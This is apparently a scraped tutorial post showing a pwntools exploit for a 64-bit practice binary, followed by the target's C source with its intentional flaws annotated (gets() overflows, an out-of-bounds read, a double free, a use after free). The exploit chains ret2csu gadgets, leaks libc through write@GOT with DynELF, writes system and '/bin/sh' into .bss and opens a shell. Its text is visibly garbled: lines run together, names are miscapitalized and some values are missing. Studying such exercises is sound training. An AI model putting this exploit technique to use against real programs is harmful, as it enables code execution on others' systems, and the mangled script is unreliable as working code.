Using the DynELF function in pwntools on 64-bit targets

Source: Internet
Author: User

Recently some classmates asked me how to use this function on 64-bit targets, so I wrote up a way to use DynELF.

Compiled program: http://pan.baidu.com/s/1jImF95O

The source code is at the end of this page.

from PWN Import *elf = Elf ('./pwn_final ') Got_write = elf.got[' write ']print ' got_write= ' + hex (got_write) Call_get_name_fu NC = 0x400966print ' call_get_name_func= ' + hex (call_get_name_func) Got_read = elf.got[' read ']print "Got_read:" + Hex (got_ Read) Bss_addr = 0x6020c0pad = ' a ' p = Process ('./pwn_final ') Gdb.attach (p) #get system addressdef Leak (address): P.recvunt Il (' Please enter your name: ') payload1 = pad * Payload1 + = P64 (0x400d9a) + p64 (0) + P64 (1) + P64 (got_write) + P64 ( + P64 (address) + P64 (1) + P64 (0x400d80) Payload1 + = "\x00" *56 payload1 + = P64 (call_get_name_func) p.sendline (payload1) data = p.recv print "% #x + =%s"% (address, (data or "). Encode (' hex ')) return Datad = Dynelf ( Leak, Elf=elf ('./pwn_final ')) system_addr = D.lookup (' System ', ' libc ') print "system_addr=" + Hex (system_addr) #write System &&/bin/shpayload2 = "a" *56payload2 + = P64 (0x400d96) + p64 (0) +p64 (0) + P64 (1) + P64 (got_read) + P64 (+) + P (BSS_ADDR) + p64 (0) + P64 (0x400D80) Payload2 + = "\x00" *56payload2 + = P64 (call_get_name_func) p.sendline (payload2) p.send (P64 (SYSTEM_ADDR)) P.send ("/ Bin/sh\0 ") p.recvuntil (' Name: ') # Call systempayload3 =" a "*56payload3 + = P64 (0x400d96) + p64 (0) +p64 (0) + P64 (1) + P64 (bss_a DDR) + P64 (0) + p64 (0) + p64 (bss_addr+8) + p64 (0x400d80) payload3 + = "\x00" *56payload3 + = P64 (call_get_name_func) p.sendline (PAYLOAD3) p.interactive ()

Source code

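/*
 * Source of the practice target the page runs as ./pwn_final: a small
 * "paper management" menu program.
 *
 * The memory-safety flaws are the subject of the exercise and are left in
 * place. Each is marked with a NOTE(security) comment that names the
 * weakness and the bounded alternative a production program would use.
 */
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

void print_menu(void);
void get_name(void);
void add_paper(void);
void delete_paper(void);
void show_paper(void);
int get_num(void);
void get_input(char *buffer, int size, int no_should_fill_full);
void gg(void);

/* Ten heap-allocated "papers", indexed 0-9; slots start out NULL. */
char *link_list[10];

/*
 * Entry point: disables stdio buffering, asks for the user's name, then
 * serves the menu until a choice other than 1-3 is entered.
 */
int main(void)
{
    setbuf(stdout, 0);
    setbuf(stdin, 0);
    setbuf(stderr, 0);

    int choice;

    get_name();
    while (1) {
        print_menu();
        choice = get_num();
        switch (choice) {
        case 1:
            add_paper();
            break;
        case 2:
            delete_paper();
            break;
        case 3:
            show_paper();
            break;
        default:
            /* main returns int, so give the exit path a value. */
            return 0;
        }
    }
    /* Not reached: the loop above only leaves through the return. */
    printf("Thank you!");
}

/*
 * Reads one menu choice and returns it as an int (base auto-detected by
 * strtol). Re-prompts by calling itself when no digits were parsed.
 *
 * NOTE(security): get_input() does not NUL-terminate when all 48 bytes are
 * filled or when stdin hits EOF, so strtol() and the "%s" below can read
 * past initialised data. The retry is unbounded recursion, so a long run
 * of bad input keeps growing the stack. The long-to-int narrowing is
 * unchecked.
 */
int get_num(void)
{
    int result;
    char input[48];
    char *end_ptr;

    get_input(input, 48, 1);
    result = strtol(input, &end_ptr, 0);
    if (input == end_ptr) {
        printf("%s input is not start with number!\n", input);
        result = get_num();
    }
    return result;
}

/*
 * Reads bytes from stdin into buffer, one at a time.
 *
 * buffer               destination, at least size bytes
 * size                 maximum number of bytes stored
 * no_should_fill_full  non-zero: a newline seen after at least one stored
 *                      byte is replaced by NUL and ends the read (leading
 *                      newlines are skipped); zero: newlines are stored
 *                      like any other byte until size bytes are read
 *
 * NOTE(security): the two break paths (read failure/EOF, buffer full)
 * leave the buffer without a terminator; callers must not treat it as a
 * C string unless the newline path was taken.
 */
void get_input(char *buffer, int size, int no_should_fill_full)
{
    int index = 0;
    char *current_location;
    int current_input_size;

    while (1) {
        current_location = buffer + index;
        current_input_size = fread(buffer + index, 1, 1, stdin);
        if (current_input_size <= 0)
            break;
        if (*current_location == '\n' && no_should_fill_full) {
            if (index) {
                *current_location = 0;
                return;
            }
        } else {
            index++;
            if (index >= size)
                break;
        }
    }
}

/*
 * Prompts for and reads the user's name.
 *
 * NOTE(security): gets() has no length argument, so any line longer than
 * 39 bytes writes past name[] on the stack (CWE-121). This is the flaw the
 * exercise is built around. gets() was removed in C11; the bounded form is
 * fgets(name, sizeof name, stdin).
 */
void get_name(void)
{
    char name[40];

    printf("Please enter your name:");
    gets(name);
}

/* Prints the three menu entries. */
void print_menu(void)
{
    puts("Welcome to use the improved paper Management system!");
    puts("1 add paper");
    puts("2 delete paper");
    puts("3 show Paper");
}

/*
 * Writes a caller-chosen number of bytes from the selected paper to
 * standard output.
 *
 * NOTE(security): length is taken from the user (0-2048) and is never
 * compared with the size the paper was allocated with, so this can read
 * past the allocation (CWE-125). The slot may also be NULL (never added)
 * or already freed by delete_paper(). The scanf() results are unchecked,
 * so a failed parse leaves index/length uninitialised. A bounded version
 * would store each paper's size next to its pointer and clamp to it.
 */
void show_paper(void)
{
    int index;
    int length;

    printf("Input the index of the paper want to SHow (0-9): ");
    scanf("%d", &index);
    if (index < 0 || index > 9)
        exit(1);
    printf("How long you'll enter:");
    scanf("%d", &length);
    if (length < 0 || length > 2048)
        exit(1);
    /* write() takes a file descriptor, not a FILE *. */
    write(STDOUT_FILENO, link_list[index], length);
}

/*
 * Allocates a paper of the requested size in the chosen slot and reads its
 * content from stdin.
 *
 * NOTE(security): the content is read with gets(), which ignores the
 * length just passed to malloc(), so input longer than the allocation
 * overflows the heap chunk (CWE-122). A previous pointer in the slot is
 * overwritten without being freed. The bounded form is
 * fgets(link_list[index], length, stdin) with length > 0.
 */
void add_paper(void)
{
    int index;
    int length;

    printf("Input the index you want to store (0-9):");
    scanf("%d", &index);
    if (index < 0 || index > 9)
        exit(1);
    printf("How long you'll enter:");
    scanf("%d", &length);
    if (length < 0 || length > 2048)
        exit(1);
    link_list[index] = malloc(length);
    if (link_list[index] == NULL)
        exit(1);
    printf("Please enter your content:");
    gets(link_list[index]);
    printf("Add success!\n");
}

/*
 * Frees the paper in the chosen slot.
 *
 * NOTE(security): the slot keeps its stale pointer after free(), so
 * deleting the same index twice is a double free (CWE-415) and
 * show_paper() on that index is a use after free (CWE-416). Setting
 * link_list[index] = NULL after the free closes both.
 */
void delete_paper(void)
{
    int index;

    printf("which paper want to delete,please enter it's index (0-9):");
    scanf("%d", &index);
    if (index < 0 || index > 9)
        exit(1);
    free(link_list[index]);
    puts("Delete success!");
}

/*
 * Reads up to 40 bytes from standard input into a local buffer.
 * Not called from anywhere in this listing.
 */
void gg(void)
{
    char name[40];

    /* read() takes a file descriptor, not a FILE *. */
    read(STDIN_FILENO, name, 40);
}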
